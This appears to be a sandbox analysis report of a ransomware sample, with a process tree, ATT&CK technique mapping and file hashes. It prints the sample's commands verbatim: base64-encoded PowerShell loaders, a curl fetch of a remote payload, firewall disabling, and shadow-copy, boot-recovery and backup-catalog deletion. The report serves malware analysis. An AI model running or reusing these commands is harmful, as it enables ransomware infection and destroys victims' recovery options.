cABJAC8AZQBlAEQAKwAzAFQAOQBkAEIATABNACsAZgBFAHMAeQB4AGIATABVADkANgBGAFgAeABnAC8AcgBPACsAUwBnADAAdgBlAFoAMAB5AFMAKwBjAEYAbABFAHMAWQBjAGsAdAAvAEYARQB6ADcARABaAE4AeQBoAFoAMgBRAHYARwBXADcAbgB2AFAAOAB4AGoASABFAEoAbABqACsAdwBRAHUAWABtAC8AdAA3ACsAWABqADMAMwA1AEIAVQB0AGEARwBGADYARgA4AHgAVQBOAEsASQBsAHAATAB0AG0AMABaAFIANgAvAHIAMQB0AG4AWAA1AEIALwBmAEQAbgBtADYAMwBFAE0AWgA3ADgAYQBDAHgAUABUAHkAdgA5AGwAQwBpAEsAbAArAGIASgArAFEATABSAHoAeQBVAG4AOQBUAE4ARwBNAGQAUwBhAFIAagA5ACsAUwBoADUAbABZADUAMgB4ADEANwBjAHQAaAAwAHkANgBzAHQAYgBhAEgAaQBxAEoAMQBpAEcAWQBkAEwAQQAwAGMASABJAGEAWQBZAGsAcQBuAEwAMABWADIAVgBFAEYAMAB5AGgAUABxAFMAWQBxAEIAWQBVAEMAbgBLAHoATQBHAGUAcwBBAHEAdgBNAGYAbwBRAGcATwBhAFUAaQBtAE4AeQB1AEUAMwBwAG0ARgAwAFgAVAA5AG8AdABlAG4AeQBJAHIASgBuAE0AdQBDAFUAeABnAGwASAAwAFcAbQBMAEcAVQBaACsAZABkAEsAOQBWAGoAOABoAEYAVQBxAEgAYQBYACsAVgBkADYANwAzAEsAWQBaADUAeABtAG4AWQBkAGsAcgBFAFIASQBNAFYAbABrAHYAagBDAFEAZQBCAEQAUwAyAEsAUgByADYAaABNAFEAbABoAFMAQwAwAEwAZQBwAFEARQBtAGYAUwBJAGUAKwBRAGkAYgB3AHIAawA2AHEATQBpAG4ANgBtAGQALwBoADkAegBBAEsAZQBxADQAeAB2AFQASQBLAFYAVABYAGIARgB4AFAAVwBmAE8AZQBZAFoAMwBaAEIAbgBqAFYAcQBxAGUASABYAE0AUwBIAHUAcgBNAEcAMgBtAG8AOABMADYAUwAzAG0ATQBhAEwAMAAwAG0AWgAvAGgAKwBuAEgARQA4AFYATgB1AHAAawAxADEAeQBzAEoATQBhAEUAQwBPAEoAOABuAEoARABnAHUAbAB2AEcAaABjAG0AMgA1AG8AbgB0AGwAUwBpAE0AZQBmAEcARQBhAHUAdgB6ADIAMgBWAEoAcABTAHEAZABZAG0AVABSAHAAeQBYAEcAbABHADAAZABtAHIARwB1AFMAdgByAE4ASgAyAEQAcQBoAEMARQBXAFQAaABRAG4ANABBAHAANwBNADEALwBLAHIASwB4AEUAVQBCAEMARwBDAEkAcwAwAHEAaABOADcATQBJAHQARQBvAGMAeQBVAG8AcABrAGQANABFADYAbwAwAFIAbQB1AEEAawBHADQARQA0AEoAcABvAEcAaABGAHkASABvADkAVwA2AC8AYwA2AFgAdQA3AHgAaAAvAE4AbQA4AEsALwBpACsAdAByADgAWABCAG8ASwBCADkAVwAyAFMAUwBCAHgAbgBaAEQAbgBJAHIATQAvADkAYgBNAEoAQgBJAFQAaAA1AG0AYwBUADUAcABzAGkAaABoADIAQgBuAHUARABkAEgAawBvADQASgBPAHIAcAA5ADUANABFAGoAMQAzAE0AYwA2AE4AQgBNAEwAbwB2AGIAMQBuAGUAbABYAEwAawBUAEIATwBWAEkAbABRAGYAMQB1AFYAbQBVADkAYQBsAGEAbgBvAFUARABxAFIANQBYAEEANgBYAGgATQBpAEUAbQBHAHcAQwAzADgAMgA1ADUANwB2AGsAdABVAHAASwBYADkAdQBPAEgAUwByAEcAQQBrAHEAaABMAFYAagByAGEARQBrAHQARgA1ADcAZwBoAGoAOQBDAFUARABiAEcAYwBTAHYAUQAvADUASwByAFYAWgBmAHgAMABhAGcANgBIAFgAZABNAHoANwB3AHoAagB6AGsANABtAGYAbwBRAEMAZABzAE4AVQBUAHIASQBrAGYAUwAxAEQAdQAyAFEANgAxAEUAVgBEAFgAUABVAEcAMABkAFIAeQBTADUAcABCAFkAbABQAFgASQBuAGQAWgBpAEgAOQBWAHcAcwAzADQAOAByAFMAYwBsADYAVgB4AC8AWABpAGEASwBPAE4AWgB3ADAAeABOAHAAMAB2AEoAMwBKAFoAZQBSAHIASQBFAHEALwArAEUAYQA0AGwARwA0AC8AaQBUAFkAWAB3ACsAYgBJAHIAMwBvAHYASAA1AHgARABCAGEANwBYAFkAVABrAFkAMwB0AHkAUQBDAFYAWgBMADQAeABGAGgAVwBkAHkAOQA1AEoAVgBuAEUAbQAyAGcAcQBIADkAZwBlAGUANQBMAGUAVABtAFoAOQArAHIAKwBjAC8AaQBrAHEAZgBtAE8AUgB6AGIAdwBEAEkAMABvADMAOQAwAG4ASwBBAHgAaQBkAG4AQwBqAGgANAAwAFoAVgBwAFkAZABRAGMAdABxAE0AYQBJAEkAQwAxAGkAWABlAEQATwBVAGIAVgA4ADgAZwBDAHoAVABLAE8AZwB6AGoAQgAyAEwAWgBoAGwAbQBZADIANgB5AFYAbwB0AEsAbABVAGsAdgB4AGUAegByAHQANgBqAE0AUgBKAE4ASgBXAHAANAA4ADkAbAByAGIASwBZAGIAZAB2AFMASABQAG0AcwB6AEoAaQA1ADYAWAAyAG0AeABMAFgAeQBYAGgAZABTAGIARgBkAFMAKwBSAEEAcQB3ACsANgBUAHYAbQBKAEYAbwBiAGIAYQAzAGkARQBMADAATQBpADIATQBWAFYAMAB3AGIAVgBpAFkASABvAHYAUwBTAGUAUwAwADEAYQB0AG0ASwB6AEkAbwA4AFcAWQBQAEoAeQA3AGEAUAAvAE8AUgAyAEcAagB5AGoANwBYAFAAaABwAHUASgB3AEUAYgBwAHMAKwBUAFMAMAB4AC8AaQBqAHIAdQBPAEcAcQBEAE4AMwAwAE4AYQBHAEQAagBsAFIAdQBYAEIAdgA5AGUAYgBEADYAegB5AHQANwBVADUAOABqAFEAbQBrADMAVwBGAEcAYQA1AFcASABrAEkAQwBWAHkAegBvAC8AOAAxAE0AQgA4AEkARwBRAHgAcgB4AEgAZwB1AGsAeQAxAEEAcwBTAFEAZwBpAHUAdwBGAHoAKwBlAHMAUgAyAFcATgBkAHgARwBWADAAWQA2AEsATABRAFQAcwBTAG8AegBCAHgATwAvADYAWABLAHcAVwBVADEAOQByAGwAagBBADMAWQAyAFAASQBsADkASgA2AG0AMQBYAFYAagBvAHEAZABaAHQAdwBZAFUASwB4AGMAagByACsAcgBvAHkAMQBvAHkAZABoAFQAdgBCAGcAWgBDADYAMQBmACsAOQBHAEsAdgB3AGwAbgByADMAQQA3AEQASQA1AHUAeABaAE4AawBDAHYAdgBkAFUAVQBjAG8AYwBIAEQATwBjAG0AaAAyAG4ASQArAGgANgArAHQAQgA1AGwAMgB1AGoAUAAzADUAVgBzAHIAQgB5AGwAdgBBAFcAagAyAFkASABjADAANABKAGUAcgBGAGYAVgBkAHAAOABLAGIAbwBOAFkAKwBvADQAcQAyAHcAbQA3AHYAcwBGAFEAeQBEAFgANwB4AFUALwBOADgAeABJAHgAVgA3AGwAWABHAHAAVQBLAG4AOQB2AGUASQAvACcAIAApACAALAAgAFsAaQBvAC4AQwBPAG0AUAByAGUAUwBzAEkATwBuAC4AQwBPAG0AcABSAGUAcwBzAEkATwBuAG0AbwBEAEUAXQA6ADoAZABFAEMATwBNAFAAUgBFAHMAcwAgACkAfAAgACUAIAB7AG4ARQB3AC0ATwBiAEoARQBDAFQAIAAgAGkAbwAuAFMAdAByAEUAYQBtAHIAZQBBAEQAZQByACgAIAAkAF8ALAAgAFsAdABlAFgAVAAuAGUAbgBjAE8ARABJAE4AZwBdADoAOgBhAHMAQwBpAEkAIAApACAAfQB8ACUAewAgACQAXwAuAFIARQBhAGQAdABPAGUATgBkACgAKQB9ACAAKQA=
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand IAAuACAAKAAgACQAZQBuAHYAOgBDAG8AbQBTAFAARQBjAFsANAAsADIANAAsADIANQBdAC0ASgBPAGkAbgAnACcAKQAoAG4ARQB3AC0ATwBiAEoARQBDAFQAIAAgAGkATwAuAGMAbwBNAFAAcgBlAFMAcwBJAE8ATgAuAEQARQBmAGwAYQB0AEUAUwBUAHIAZQBhAG0AKABbAFMAWQBzAFQAZQBtAC4ASQBPAC4AbQBlAG0AbwByAFkAUwB0AHIARQBhAE0AXQAgAFsAUwB5AHMAdABlAE0ALgBjAG8ATgBWAGUAUgBUAF0AOgA6AEYAcgBPAG0AYgBhAFMARQA2ADQAUwB0AHIAaQBOAGcAKAAnAGIAVgBYAHYAYwA1AHAAWQBGAFAAMgBlAG0AZgB3AFAAYgB4AHkAMwA2AEwAYQBRAGEATgBwAGsAbQA1ADMAOQBRAEIAUQBUAFUANABJAE8AWQBqAHAAcAAwAHUAawBsACsAbwBnADAAQwBCAFkAeABQADQAYgBsAGYAOQA5AHoASAAyAEoAMAB0AGgAOQA4AEkATAB4ADMANwB6AG4AbgAzAG4AcwBRAG8AdgA2AFkASABwADEAOABzADgAVQAvAFEAdAB4AG0ATgB3AHYANQB2AFYASABMADIAMABYAGUASwB2AEwARABvAHEAYgAzAHQAQwBzAGoASABCAGgARAAzADcAdgBRAFAAbQBpAGoAVABHAEoAZAAzAG0AagBOAHYANABWAFkAWABvAHYASAB5ADUATQBqAEkAUgBvADQANgBiADAATwAxAGMAbgBxAG0ATgBDAE0AbwBCAC8AeAA3AG4ANgBpAE4AWQBWAG8AQwBqADQAaABNADcAMgBmAHkAVABtAE8AYQBFADkAbQBxAHIAMwBYACsAaQBhAFcAZQAxAHUAZQBJAGoAUAB1ADIAdABqAGEAdQBQAFYAdQBkAG0ATgBwAFQAMQBiAHEASQBWAEkAbgBjAGMAcABRAEgASwB1AGUAcgA4AGkAMQBDADgARABHAHoAaABQAGcAUABTAHoAeQBvAHkASgB2ADQAOQBKAGkAKwBIAC8AaABoAC8AOAB0AEIAUABsAGMANQBKADgANABWAFAANgB4AFUATQB4AHcAYQBlAEUAQgA3AHoAaABSAFIASQArAHgAWQBsAFAAcgB1AEsAZwBKAFAAUgBEAGEARQBNAG4AOABNAEQANwBnAEMAMwA0AEgARAB5AEgAVwBKAEQAcABJAC8AZQBlAEQAKwAzAFQAOQBkAEIATABNACsAZgBFAHMAeQB4AGIATABVADkANgBGAFgAeABnAC8AcgBPACsAUwBnADAAdgBlAFoAMAB5AFMAKwBjAEYAbABFAHMAWQBjAGsAdAAvAEYARQB6ADcARABaAE4AeQBoAFoAMgBRAHYARwBXADcAbgB2AFAAOAB4AGoASABFAEoAbABqACsAdwBRAHUAWABtAC8AdAA3ACsAWABqADMAMwA1AEIAVQB0AGEARwBGADYARgA4AHgAVQBOAEsASQBsAHAATAB0AG0AMABaAFIANgAvAHIAMQB0AG4AWAA1AEIALwBmAEQAbgBtADYAMwBFAE0AWgA3ADgAYQBDAHgAUABUAHkAdgA5AGwAQwBpAEsAbAArAGIASgArAFEATABSAHoAeQBVAG4AOQBUAE4ARwBNAGQAUwBhAFIAagA5ACsAUwBoADUAbABZADUAMgB4ADEANwBjAHQAaAAwAHkANgBzAHQAYgBhAEgAaQBxAEoAMQBpAEcAWQBkAEwAQQAwAGMASABJAGEAWQBZAGsAcQBuAEwAMABWADIAVgBFAEYAMAB5AGgAUABxAFMAWQBxAEIAWQBVAEMAbgBLAHoATQBHAGUAcwBBAHEAdgBNAGYAbwBRAGcATwBhAFUAaQBtAE4AeQB1AEUAMwBwAG0ARgAwAFgAVAA5AG8AdABlAG4AeQBJAHIASgBuAE0AdQBDAFUAeABnAGwASAAwAFcAbQBMAEcAVQBaACsAZABkAEsAOQBWAGoAOABoAEYAVQBxAEgAYQBYACsAVgBkADYANwAzAEsAWQBaADUAeABtAG4AWQBkAGsAcgBFAFIASQBNAFYAbABrAHYAagBDAFEAZQBCAEQAUwAyAEsAUgByADYAaABNAFEAbABoAFMAQwAwAEwAZQBwAFEARQBtAGYAUwBJAGUAKwBRAGkAYgB3AHIAawA2AHEATQBpAG4ANgBtAGQALwBoADkAegBBAEsAZQBxADQAeAB2AFQASQBLAFYAVABYAGIARgB4AFAAVwBmAE8AZQBZAFoAMwBaAEIAbgBqAFYAcQBxAGUASABYAE0AUwBIAHUAcgBNAEcAMgBtAG8AOABMADYAUwAzAG0ATQBhAEwAMAAwAG0AWgAvAGgAKwBuAEgARQA4AFYATgB1AHAAawAxADEAeQBzAEoATQBhAEUAQwBPAEoAOABuAEoARABnAHUAbAB2AEcAaABjAG0AMgA1AG8AbgB0AGwAUwBpAE0AZQBmAEcARQBhAHUAdgB6ADIAMgBWAEoAcABTAHEAZABZAG0AVABSAHAAeQBYAEcAbABHADAAZABtAHIARwB1AFMAdgByAE4ASgAyAEQAcQBoAEMARQBXAFQAaABRAG4ANABBAHAANwBNADEALwBLAHIASwB4AEUAVQBCAEMARwBDAEkAcwAwAHEAaABOADcATQBJAHQARQBvAGMAeQBVAG8AcABrAGQANABFADYAbwAwAFIAbQB1AEEAawBHADQARQA0AEoAcABvAEcAaABGAHkASABvADkAVwA2AC8AYwA2AFgAdQA3AHgAaAAvAE4AbQA4AEsALwBpACsAdAByADgAWABCAG8ASwBCADkAVwAyAFMAUwBCAHgAbgBaAEQAbgBJAHIATQAvADkAYgBNAEoAQgBJAFQAaAA1AG0AYwBUADUAcABzAGkAaABoADIAQgBuAHUARABkAEgAawBvADQASgBPAHIAcAA5ADUANABFAGoAMQAzAE0AYwA2AE4AQgBNAEwAbwB2AGIAMQBuAGUAbABYAEwAawBUAEIATwBWAEkAbABRAGYAMQB1AFYAbQBVADkAYQBsAGEAbgBvAFUARABxAFIANQBYAEEANgBYAGgATQBpAEUAbQBHAHcAQwAzADgAMgA1ADUANwB2AGsAdABVAHAASwBYADkAdQBPAEgAUwByAEcAQQBrAHEAaABMAFYAagByAGEARQBrAHQARgA1ADcAZwBoAGoAOQBDAFUARABiAEcAYwBTAHYAUQAvADUASwByAFYAWgBmAHgAMABhAGcANgBIAFgAZABNAHoANwB3AHoAagB6AGsANABtAGYAbwBRAEMAZABzAE4AVQBUAHIASQBrAGYAUwAxAEQAdQAyAFEANgAxAEUAVgBEAFgAUABVAEcAMABkAFIAeQBTADUAcABCAFkAbABQAFgASQBuAGQAWgBpAEgAOQBWAHcAcwAzADQAOAByAFMAYwBsADYAVgB4AC8AWABpAGEASwBPAE4AWgB3ADAAeABOAHAAMAB2AEoAMwBKAFoAZQBSAHIASQBFAHEALwArAEUAYQA0AGwARwA0AC8AaQBUAFkAWAB3ACsAYgBJAHIAMwBvAHYASAA1AHgARABCAGEANwBYAFkAVABrAFkAMwB0AHkAUQBDAFYAWgBMADQAeABGAGgAVwBkAHkAOQA1AEoAVgBuAEUAbQAyAGcAcQBIADkAZwBlAGUANQBMAGUAVABtAFoAOQArAHIAKwBjAC8AaQBrAHEAZgBtAE8AUgB6AGIAdwBEAEkAMABvADMAOQAwAG4ASwBBAHgAaQBkAG4AQwBqAGgANAAwAFoAVgBwAFkAZABRAGMAdABxAE0AYQBJAEkAQwAxAGkAWABlAEQATwBVAGIAVgA4ADgAZwBDAHoAVABLAE8AZwB6AGoAQgAyAEwAWgBoAGwAbQBZADIANgB5AFYAbwB0AEsAbABVAGsAdgB4AGUAegByAHQANgBqAE0AUgBKAE4ASgBXAHAANAA4ADkAbAByAGIASwBZAGIAZAB2AFMASABQAG0AcwB6AEoAaQA1ADYAWAAyAG0AeABMAFgAeQBYAGgAZABTAGIARgBkAFMAKwBSAEEAcQB3ACsANgBUAHYAbQBKAEYAbwBiAGIAYQAzAGkARQBMADAATQBpADIATQBWAFYAMAB3AGIAVgBpAFkASABvAHYAUwBTAGUAUwAwADEAYQB0AG0ASwB6AEkAbwA4AFcAWQBQAEoAeQA3AGEAUAAvAE8AUgAyAEcAagB5AGoANwBYAFAAaABwAHUASgB3AEUAYgBwAHMAKwBUAFMAMAB4AC8AaQBqAHIAdQBPAEcAcQBEAE4AMwAwAE4AYQBHAEQAagBsAFIAdQBYAEIAdgA5AGUAYgBEADYAegB5AHQANwBVADUAOABqAFEAbQBrADMAVwBGAEcAYQA1AFcASABrAEkAQwBWAHkAegBvAC8AOAAxAE0AQgA4AEkARwBRAHgAcgB4AEgAZwB1AGsAeQAxAEEAcwBTAFEAZwBpAHUAdwBGAHoAKwBlAHMAUgAyAFcATgBkAHgARwBWADAAWQA2AEsATABRAFQAcwBTAG8AegBCAHgATwAvADYAWABLAHcAVwBVADEAOQByAGwAagBBADMAWQAyAFAASQBsADkASgA2AG0AMQBYAFYAagBvAHEAZABaAHQAdwBZAFUASwB4AGMAagByACsAcgBvAHkAMQBvAHkAZABoAFQAdgBCAGcAWgBDADYAMQBmACsAOQBHAEsAdgB3AGwAbgByADMAQQA3AEQASQA1AHUAeABaAE4AawBDAHYAdgBkAFUAVQBjAG8AYwBIAEQATwBjAG0AaAAyAG4ASQArAGgANgArAHQAQgA1AGwAMgB1AGoAUAAzADUAVgBzAHIAQgB5AGwAdgBBAFcAagAyAFkASABjADAANABKAGUAcgBGAGYAVgBkAHAAOABLAGIAbwBOAFkAKwBvADQAcQAyAHcAbQA3AHYAcwBGAFEAeQBEAFgANwB4AFUALwBOADgAeABJAHgAVgA3AGwAWABHAHAAVQBLAG4AOQB2AGUASQAvACcAIAApACAALAAgAFsAaQBvAC4AQwBPAG0AUAByAGUAUwBzAEkATwBuAC4AQwBPAG0AcABSAGUAcwBzAEkATwBuAG0AbwBEAEUAXQA6ADoAZABFAEMATwBNAFAAUgBFAHMAcwAgACkAfAAgACUAIAB7AG4ARQB3AC0ATwBiAEoARQBDAFQAIAAgAGkAbwAuAFMAdAByAEUAYQBtAHIAZQBBAEQAZQByACgAIAAkAF8ALAAgAFsAdABlAFgAVAAuAGUAbgBjAE8ARABJAE4AZwBdADoAOgBhAHMAQwBpAEkAIAApACAAfQB8ACUAewAgACQAXwAuAFIARQBhAGQAdABPAGUATgBkACgAKQB9ACAAKQA=
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364

C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolderXk\AVG update.exe
"C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolderXk\AVG update.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\SYSTEM32\cmd.exe
cmd /C taskkill /F /IM "SmartScreen Defender Windows.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\system32\taskkill.exe
taskkill /F /IM "SmartScreen Defender Windows.exe"
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"C:\Users\Admin\AppData\Local\Temp\SmartScreen Defender Windows.exe" /target:winexe /platform:x86 "C:\Users\Admin\AppData\Local\Temp\WJcavBi.tmp" "C:\Users\Admin\AppData\Local\Temp\elMyDXVZX.tmp"
6⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC956.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6CEF18A438AB4A1B91D6D36DC5B7456A.TMP"
7⤵
PID:3064

C:\Windows\SYSTEM32\cmd.exe
cmd /C powershell -Command "Get-Process -Name 'explorer' | Select-Object -ExpandProperty Id"
6⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-Process -Name 'explorer' | Select-Object -ExpandProperty Id"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\SYSTEM32\cmd.exe
cmd /C curl -s https://gitea.com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST.txt
6⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\system32\curl.exe
curl -s https://gitea.com/JoinPokingo/JingaPol/raw/branch/main/AppVStreamingUX_FST.txt
7⤵
PID:652

C:\Windows\SYSTEM32\cmd.exe
cmd /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolderXk\AVG update.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
7⤵
- Runs ping.exe
PID:4144

C:\Users\Admin\AppData\Local\Temp\SmartScreen Defender Windows.exe
"C:\Windows\System32\SmartScreen Defender Windows.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988

C:\Users\Admin\AppData\Local\Temp\SmartScreen Defender Windows.exe
"C:\Users\Admin\AppData\Local\Temp\SmartScreen Defender Windows.exe"
3⤵
- Executes dropped EXE
PID:3264

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\System32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:4300

C:\Windows\System32\netsh.exe
netsh firewall set opmode mode=disable
4⤵
- Modifies Windows Firewall
PID:1540

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\System32\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:3376

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\System32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:4548

C:\Windows\System32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1436

C:\Windows\System32\wbadmin.exe
wbadmin delete catalog -quiet
4⤵
- Deletes backup catalog
PID:1304

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3208

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[5095EB67-3512].[[email protected]].faust

Filesize
3.2MB

MD5
e9b22283624f08474bad4a78852c118e

SHA1
ac5692fb8d033d74d8c441ba462fa6ef2dea7f00

SHA256
c130364024627d9f5e36df9ed7d941a3674fe7620342f0e317ecd429092b24bb

SHA512
71452e51337400beb7e218461c30f65441235c8ee3a2af88ff6d90bdd4e1f973fc617c45b7e6e96f0d8a663b5c9d37cf3722c60e35f4d367003bf7b2f785fe24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2247453c28acd1eb75cfe181540458a8

SHA1
851fc5a9950d422d76163fdc6a453d6859d56660

SHA256
358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

SHA512
42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

Download Submit
C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolderXk\AVG update.exe

Filesize
477KB

MD5
783017c5bcd0afc6e72d4b04763f584b

SHA1
4cee55b7106c92972f534ad96b393f92c73f491e

SHA256
a0a59d83fa8631d0b9de2f477350faa89499e96fd5ec07069e30992aaabe913a

SHA512
8a5fbc063b1cca41ccd29499f37024bea3d4f47005eb113cb4f3da0937e87d86349d3d7a168edc8d6fed29cf6b6fd09ad882021f14bb48b8683099c8b736ef20

Download Submit
C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolderXk\AVG update.exe

Filesize
64KB

MD5
2f10440856acf56e19e49733fb637c5a

SHA1
1ce0b5f8c779ff29bf0025ac77a9b888a70bb79c

SHA256
3762d3a715e711c528de3f418dac9c065f8943996465259ee712167fdaa353b4

SHA512
b5513ab6356f2c4c31d371f02d5ec7b572511f540cf8d6df652ab46cff39d37c1b4e08d3ea881c8f5c93ff37f7574c5404cf53f7b64501497f08400ed672bd8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\NeLDE.tmp

Filesize
1.9MB

MD5
47ccb0e28d73f695c5d5266ffbb300ec

SHA1
63e6167944df951ad2d279d0b64e37bf2f604c07

SHA256
12d1bac765448db638adc8327de1101e5e2eb5829b8da7edd5b216a45c717eec

SHA512
8219f5cfd7a6bf28b8880529240e0b49a2fd78c0c5227cf6471cbf153fd32b2664ae31396d4b6897c2686e5b7826b9f9dad434e82e7032c7a5aa3ee9b2771145

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC956.tmp

Filesize
2KB

MD5
42c789b3f05f27e1789785042ddcf895

SHA1
0c9a694c1cc41a7b881fdef48cd18dc6bb998c93

SHA256
1ba75a6efea0109f1e0f9f489ad661eb061bc4c98d87ffe3429c02d812581206

SHA512
87f708ce4d9d9fa4a93559910c2573695c2e8fd557030771dff914af81ac2ee2a1250c0712531c7772a291246c84e0b28a0279cdf510035255b2b1bece84a76f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartScreen Defender Windows.exe

Filesize
5KB

MD5
aa1753713c875707503834420cb7b5e5

SHA1
f29b0e3d8ed62fb5c3797515c85262e480970f07

SHA256
1322e37dd970f638bad496e0b00da873990d1cc30bb9490b550d1d71dc0d0f43

SHA512
4406ddc00d4abcc9a6c35b89f716a45ef0c9493ec44824f2314c41e68d6e6b0c2ed83314bbbb560868140ad2be58842f19745c3053bb338884f4cf979314632f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcrztbb3.x1h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ljZcga.xlsx

Filesize
36KB

MD5
e9b850a19ed32abb2e6354ff88bd5f10

SHA1
0df4a63fb1f2534d3055c9e548f8af2186282a6b

SHA256
f659ad02449513b9fd12aceac62c513752c7689a05b8f177bdd1ebafaeacc371

SHA512
a1d7012cee101fbc5097a67eddd5db07adbd31571e7a681b71d92aabe830e3cd824e324b7246dfaf1794ba98e680c8eeaaa46d38d7dce1a789f7bd4a5ea72ca7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6CEF18A438AB4A1B91D6D36DC5B7456A.TMP

Filesize
1KB

MD5
40522bcc0792279ee1d1ca86336c31e9

SHA1
b4a69498684c843258d0c50108ee8126bda957d0

SHA256
edeb37afbf65bd3428743889df08930d27646f93edffbeb4a552aab86c5a4c52

SHA512
c9940416b6cb47c505882765a9e4408994cdde642cb3a06249f95fc27c49ab4c1550ac487ec8be727cc693484ce58b4bcde744e58d1f996467746fa94028ea26

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\WJcavBi.tmp

Filesize
346B

MD5
59657f4952e82ce1ccff121b90949a0c

SHA1
a4bef89c23215224a18bf5d4dd4f674dd1e1c4dd

SHA256
